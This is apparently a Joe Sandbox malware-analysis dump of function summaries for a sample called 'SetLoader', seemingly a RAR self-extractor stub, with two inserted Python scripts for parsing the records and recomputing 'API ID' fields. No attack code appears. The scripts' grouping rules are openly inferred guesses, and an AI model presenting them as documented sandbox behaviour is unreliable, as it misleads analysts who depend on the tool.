                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00634F5F
                                              • _ValidateLocalCookies.LIBCMT ref: 00634FE8
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00635013
                                              • _ValidateLocalCookies.LIBCMT ref: 00635068
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                              • String ID: Mc$csm
                                              • API String ID: 1170836740-1810962383
                                              • Opcode ID: 7957533d700eb1d36ddd2fd2248b044873c6b19e3fd6bb3b8f597e7fa6be9e6a
                                              • Instruction ID: 56d807497c0b34ce42040592ede5d4be530730987dcc028881ff683ed10d69f4
                                              • Opcode Fuzzy Hash: 7957533d700eb1d36ddd2fd2248b044873c6b19e3fd6bb3b8f597e7fa6be9e6a
                                              • Instruction Fuzzy Hash: FF41A334A00219AFCF10DF68C885A9EBBF6FF45314F188159F8159B352DB31AA45CBD1
                                              APIs
                                                • Part of subcall function 00611366: GetDlgItem.USER32(00000000,00003021), ref: 006113AA
                                                • Part of subcall function 00611366: SetWindowTextW.USER32(00000000,006465F4), ref: 006113C0
                                              • SendMessageW.USER32(?,00000080,00000001,004F01B1), ref: 0062D937
                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0062D950
                                              • SetWindowTextW.USER32(?,?), ref: 0062D961
                                              • GetDlgItem.USER32(?,00000065), ref: 0062D96A
                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0062D97E
                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0062D994
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: MessageSend$Item$TextWindow
                                              • String ID: LICENSEDLG
                                              • API String ID: 224466086-2177901306
                                              • Opcode ID: 5f195c51b88962a8e51b8fccef9ce8368a9c54b53ade891212a7920b75f11193
                                              • Instruction ID: 35ed121bfd80a320e4b3f66e388cb2978c874b6c15b6f36427e3ac7e1c8611d3
                                              • Opcode Fuzzy Hash: 5f195c51b88962a8e51b8fccef9ce8368a9c54b53ade891212a7920b75f11193
                                              • Instruction Fuzzy Hash: 20212732604624BBE7155F25FC09FBB3B6FEB46B82F045018F244A22A0CB629981DB71
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: </p>$</style>$<br>$<style>$>
                                              • API String ID: 176396367-3568243669
                                              • Opcode ID: 8bfa53577f3ac69f715720a26500b06507cd986cdbe7459e36c75b4b5a5a98e1
                                              • Instruction ID: a21527f2616ca73ff39ffd1ec73bb47c4580d7ca2354689072f0613eb4bd845f
                                              • Opcode Fuzzy Hash: 8bfa53577f3ac69f715720a26500b06507cd986cdbe7459e36c75b4b5a5a98e1
                                              • Instruction Fuzzy Hash: 0551F766744B7356DB305A19B8117F663E3DFA0790F692C2AFDC08B3C1FB648C818A65
                                              APIs
                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0061AD2B
                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0061AD4A
                                                • Part of subcall function 0061E208: _wcslen.LIBCMT ref: 0061E210
                                                • Part of subcall function 00624168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0061E084,00000000,.exe,?,?,00000800,?,?,?,0062AD5D), ref: 0062417E
                                              • _swprintf.LIBCMT ref: 0061ADEC
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                              • MoveFileW.KERNEL32(?,?), ref: 0061AE5E
                                              • MoveFileW.KERNEL32(?,?), ref: 0061AE9E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FileMoveNamePath$CompareLongShortString__vswprintf_c_l_swprintf_wcslen
                                              • String ID: rtmp%d
                                              • API String ID: 2133196417-3303766350
                                              • Opcode ID: d6dc87a37e7a3887fe79c667eb9c9041bc9442f7d993adc0a86ac4e7f7b09b6d
                                              • Instruction ID: 6b6b24c67efac43d6c5b65385fead623f354407457b2b2248f2dafc2b2583459
                                              • Opcode Fuzzy Hash: d6dc87a37e7a3887fe79c667eb9c9041bc9442f7d993adc0a86ac4e7f7b09b6d
                                              • Instruction Fuzzy Hash: CD51A1719016196ACF20EBA0CC95EEF777EAF05340F0808A9F555E3141EB359AC8EF65
                                              APIs
                                              • ShowWindow.USER32(?,00000000), ref: 0062BE8A
                                              • GetWindowRect.USER32(?,?), ref: 0062BED1
                                              • ShowWindow.USER32(?,00000005,00000000), ref: 0062BF6C
                                              • SetWindowTextW.USER32(?,00000000), ref: 0062BF74
                                              • ShowWindow.USER32(00000000,00000005), ref: 0062BF8A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Window$Show$RectText
                                              • String ID: RarHtmlClassName
                                              • API String ID: 3937224194-1658105358
                                              • Opcode ID: 6d8384f592f82ed92f62dce61cd638d37076ae12d1fc3068f70d4b054c39134d
                                              • Instruction ID: 5b760f5a1dad0b731b3a80b9f07b085ee2e8cb2ce88f347234fda1393f520c85
                                              • Opcode Fuzzy Hash: 6d8384f592f82ed92f62dce61cd638d37076ae12d1fc3068f70d4b054c39134d
                                              • Instruction Fuzzy Hash: C341F172108710AFCB109F64ED49BAB7BEAEF48340F49951DFD489A252CB30D840CFA6
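Triage of a report this size is easier once the function summaries are structured records rather than page text. The parser below is an added example; it is not Joe Sandbox code and not code from the analysed sample. It assumes the layout seen in the blocks above: an `APIs` heading opens each record, the headings `Strings`, `Memory Dump Source`, `Joe Sandbox IDA Plugin` and `Similarity` mark sections inside it, bullets under `APIs` read `Name.MODULE(args), ref: ADDR` with an optional `Part of subcall function ADDR:` prefix, all other bullets are `Key: value`, and `$` separates multiple entries in `String ID`. All of these are assumptions read off this page. The sample input is constructed from two records on this page, with the `Download File` link label left glued to an `Associated:` value to show that it is stripped.

```python
"""Parse Joe Sandbox function-summary records ('APIs' / 'Similarity' blocks) for triage.
Added example, not Joe Sandbox or sample code; layout assumptions are in the comments."""

import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional

SECTION_HEADINGS = {"APIs", "Strings", "Memory Dump Source",  # 'APIs' opens a record
                    "Joe Sandbox IDA Plugin", "Similarity"}
LINK_LABEL = "Download File"  # web-widget text glued onto 'Associated:' values

# Name.MODULE(args), ref: ADDR   with optional 'Part of subcall function ADDR:' prefix
API_RE = re.compile(
    r"^(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list            # argument column as printed; '?' means unresolved
    ref: int              # call-site address
    subcall_of: Optional[int] = None  # callee address when the call is indirect

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=lambda: defaultdict(list))  # key -> [values]

    def first(self, key):
        return self.fields[key][0] if self.fields.get(key) else ""

    @property
    def strings(self):  # assumption: '$' separates entries in 'String ID'
        return [s for s in self.first("String ID").split("$") if s]

def parse_report(text):
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADINGS:
            if line == "APIs" or current is None:
                current = FunctionRecord()
                records.append(current)
            section = line
        elif line.startswith("•"):  # anything else (blank, stray text) is ignored
            body = line.lstrip("•").strip()
            if current is None:  # excerpt that begins mid-record
                current = FunctionRecord()
                records.append(current)
            if section == "APIs":
                m = API_RE.match(body)
                if m:  # unrecognised call lines are skipped, not guessed at
                    args = m.group("args")
                    current.apis.append(ApiCall(
                        m.group("name"), m.group("mod"),
                        args.split(",") if args else [], int(m.group("ref"), 16),
                        int(m.group("sub"), 16) if m.group("sub") else None))
            else:
                key, _, value = body.partition(":")
                value = value.strip()
                if value.endswith(LINK_LABEL):
                    value = value[:-len(LINK_LABEL)].strip()
                current.fields[key.strip()].append(value)
    return records

def index_by_api(records):
    """API name -> [(record index, call-site address)] for direct calls only."""
    idx = defaultdict(list)
    for n, rec in enumerate(records):
        for c in rec.apis:
            if c.subcall_of is None:
                idx[c.name].append((n, c.ref))
    return dict(idx)

# Constructed input: two records copied from this report, 'Download File' left in.
SAMPLE = r"""
APIs
• GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0061AD2B
  • Part of subcall function 0061E208: _wcslen.LIBCMT ref: 0061E210
• _swprintf.LIBCMT ref: 0061ADEC
• MoveFileW.KERNEL32(?,?), ref: 0061AE5E
• MoveFileW.KERNEL32(?,?), ref: 0061AE9E
Memory Dump Source
• Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: FileMoveNamePath$CompareLongShortString__vswprintf_c_l_swprintf_wcslen
• String ID: rtmp%d
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,0061CEA9,0061CEAB,00000000,00000000,5CB4B331,00000001,00000000,00000000,?,0061CD87,?,00000004,0061CEA9,ROOT\CIMV2), ref: 006323E9
• _com_issue_error.COMSUPP ref: 00632498
Similarity
• API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
• String ID:
"""

if __name__ == "__main__":
    for name, sites in sorted(index_by_api(parse_report(SAMPLE)).items()):
        print(f"{name:22s} {[hex(a) for _, a in sites]}")
```

Subcalls are kept on the record but excluded from `index_by_api`, so a search for an API such as `MoveFileW` returns only the functions that call it directly; the `first` and `strings` accessors give the `Similarity` fields a practitioner usually pivots on.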
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                              • API String ID: 176396367-3743748572
                                              • Opcode ID: fb13652bf73d69ba48d03c224008e9729972d504bfe7070fd4ea0a3eb9ba0d95
                                              • Instruction ID: 8491fcf5ad870b30f56ce404fc35462a66f3080aa79e0fd4740816583271a8ad
                                              • Opcode Fuzzy Hash: fb13652bf73d69ba48d03c224008e9729972d504bfe7070fd4ea0a3eb9ba0d95
                                              • Instruction Fuzzy Hash: 5B313A22A44B156AD630EA54BC42BF6B3A6EB51360F60442FFA85573C0FB60ACC587E5
                                              APIs
                                                • Part of subcall function 0063EEB8: _free.LIBCMT ref: 0063EEE1
                                              • _free.LIBCMT ref: 0063EF42
                                                • Part of subcall function 0063BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?), ref: 0063BB10
                                                • Part of subcall function 0063BAFA: GetLastError.KERNEL32(?,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?,?), ref: 0063BB22
                                              • _free.LIBCMT ref: 0063EF4D
                                              • _free.LIBCMT ref: 0063EF58
                                              • _free.LIBCMT ref: 0063EFAC
                                              • _free.LIBCMT ref: 0063EFB7
                                              • _free.LIBCMT ref: 0063EFC2
                                              • _free.LIBCMT ref: 0063EFCD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                              • Instruction ID: 28d261f0af30de5d22e4bb781daa07d0e5c41a7e61380e5a57b2834340b288b8
                                              • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                              • Instruction Fuzzy Hash: 2011FC72944B05AAE6A0F7B1CC06FCB77EEEF04700F404C1DF29A662D2DB76A50547A8
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000020,?), ref: 00618CB2
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00618CB9
                                              • GetLastError.KERNEL32 ref: 00618CF6
                                              • CloseHandle.KERNEL32(?), ref: 00618D05
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Process$CloseCurrentErrorHandleLastOpenToken
                                              • String ID: Jc$^c
                                              • API String ID: 2767541406-3363903844
                                              • Opcode ID: 438840e40884e7466c00e9969de871cfe6ba44868f8ebac4cbbdb7f7edb78b86
                                              • Instruction ID: 901084e3693929b10097c6b80d53642c5ae03a13fe6262910f8c0eeb4c039672
                                              • Opcode Fuzzy Hash: 438840e40884e7466c00e9969de871cfe6ba44868f8ebac4cbbdb7f7edb78b86
                                              • Instruction Fuzzy Hash: 8C0144B0901209AFDB109FA4DD89AFF7BBDEF05744F045419B501E3190DA309D84CB71
                                              APIs
                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00630B46,00630AA9,00630D4A), ref: 00630AE2
                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00630AF8
                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00630B0D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AddressProc$HandleModule
                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                              • API String ID: 667068680-1718035505
                                              • Opcode ID: 114b3cd6ae30733301d60a2b2e42763383239be408522eecc9695979003c774e
                                              • Instruction ID: 70709c049011b5cf970ec5233400474be589c766fe19a73a3e647cd6d3657922
                                              • Opcode Fuzzy Hash: 114b3cd6ae30733301d60a2b2e42763383239be408522eecc9695979003c774e
                                              • Instruction Fuzzy Hash: D3F028313513218B3B309FA45DB56AA62CF9E06748B3110B9E507C3340E651CC89C3D1
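The "API ID" shown in each Similarity block can be recomputed from the entry's own "APIs" lines, which is handy when you want to cluster functions across many reports without the sandbox UI. The following Python is an added example, not Joe Sandbox code; the grouping rule it implements is inferred from the entries on this page and is an assumption, not a documented Joe Sandbox algorithm: split each API name into CamelCase and underscore tokens, drop tokens of three characters or fewer (Get, Set, Rtl, For, the W suffix), count tokens across all listed calls including "Part of subcall function" lines, emit the most frequent group first, sort tokens inside a group by code point, and join groups with "$". The sample input is constructed from four entries on this page, keyed by the API ID the report prints for each.

```python
"""Recompute a Joe Sandbox "API ID" from the bullet lines of an "APIs" section.

Added example, not Joe Sandbox code. The grouping rule is inferred from the
entries on this page (assumption, not documented behaviour).
"""
import re
from collections import Counter, namedtuple

ApiCall = namedtuple("ApiCall", "name module args ref subcall_of")

# Constructed sample input: "APIs" lines copied from four entries of this
# report, keyed by the API ID the report shows for that entry.
SAMPLES = {
    "AddressProc$HandleModule": """\
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00630B46,00630AA9,00630D4A), ref: 00630AE2
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00630AF8
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00630B0D
""",
    "ErrorLastValue___vcrt_": """\
• GetLastError.KERNEL32(?,?,00635111,00634ECC,006321B4), ref: 00635128
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00635136
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0063514F
• SetLastError.KERNEL32(00000000,00635111,00634ECC,006321B4), ref: 006351A1
""",
    "Message$ObjectSingleWait$DispatchPeekTranslate": """\
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 00630059
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00630073
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00630084
• TranslateMessage.USER32(?), ref: 0063008E
• DispatchMessageW.USER32(?), ref: 00630098
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 006300A3
""",
    "_wcslen$_wcsrchr": """\
  • Part of subcall function 00622663: _wcslen.LIBCMT ref: 00622669
  • Part of subcall function 0061D848: _wcsrchr.LIBVCRUNTIME ref: 0061D85F
• _wcslen.LIBCMT ref: 0061E105
• _wcslen.LIBCMT ref: 0061E14D
""",
}

# One bullet line: optional subcall prefix, Name.MODULE, optional (args), ref: ADDR
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "_free", "___vcrt_" stay whole; CamelCase words split at capitals.
TOKEN = re.compile(r"_+[a-z0-9]+_*|[A-Z][a-z0-9]*")


def parse_api_lines(text):
    """Parse one "APIs" section into ApiCall records; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(m["args"].split(",")) if m["args"] is not None else ()
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), m["sub"]))
    return calls


def api_tokens(name):
    """GetModuleHandleW -> ['Module', 'Handle']; tokens of <= 3 chars are dropped."""
    return [t for t in TOKEN.findall(name) if len(t) > 3]


def api_id(calls):
    """Most frequent token group first, code-point order within a group, "$" between groups."""
    counts = Counter(t for c in calls for t in api_tokens(c.name))
    by_freq = {}
    for tok, n in counts.items():
        by_freq.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_freq[n])) for n in sorted(by_freq, reverse=True))


def string_id(strings):
    """The "String ID" field as this page shows it: distinct strings, sorted, "$"-joined (assumption)."""
    return "$".join(sorted(set(strings)))


def check_samples():
    """Map each expected API ID to the recomputed one, so a mismatch shows where the rule fails."""
    return {want: api_id(parse_api_lines(text)) for want, text in SAMPLES.items()}


if __name__ == "__main__":
    for want, got in check_samples().items():
        print("OK " if want == got else "BAD", want, "->", got)
    print(string_id(["KERNEL32.DLL", "AcquireSRWLockExclusive", "ReleaseSRWLockExclusive"]))
```

The numeric "API String ID" pairs (for example 667068680-1718035505) are hashes whose algorithm is not visible on the page, so the script does not attempt them; the recomputed token string is enough to match functions between reports, and the parsed `ApiCall` records (name, module, arguments, reference address, enclosing subcall) are what you would feed into a rule or a diff against a known-clean SFX stub.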
                                              APIs
                                              • _wcslen.LIBCMT ref: 00624192
                                              • _wcslen.LIBCMT ref: 006241A3
                                              • _wcslen.LIBCMT ref: 006241B3
                                              • _wcslen.LIBCMT ref: 006241C1
                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0061D2D3,?,?,00000000,?,?,?), ref: 006241DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen$CompareString
                                              • String ID: <
                                              • API String ID: 3397213944-4251816714
                                              • Opcode ID: 8fa529d9ad4e1da6e68c328f89dfaa8928a6f8c67ce963d2505e4afa6cf03880
                                              • Instruction ID: 2febf933f18cf5a0f942bdbe21e868907c751e75fbc47b6fe0ac5b4da3b8570c
                                              • Opcode Fuzzy Hash: 8fa529d9ad4e1da6e68c328f89dfaa8928a6f8c67ce963d2505e4afa6cf03880
                                              • Instruction Fuzzy Hash: 40F06732008068BFCF122F50EC09C8A3F67EF51B70F25C019F6195A0A2CE3299A29AD4
                                              APIs
                                              • _free.LIBCMT ref: 0063B17E
                                                • Part of subcall function 0063BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?), ref: 0063BB10
                                                • Part of subcall function 0063BAFA: GetLastError.KERNEL32(?,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?,?), ref: 0063BB22
                                              • _free.LIBCMT ref: 0063B190
                                              • _free.LIBCMT ref: 0063B1A3
                                              • _free.LIBCMT ref: 0063B1B4
                                              • _free.LIBCMT ref: 0063B1C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
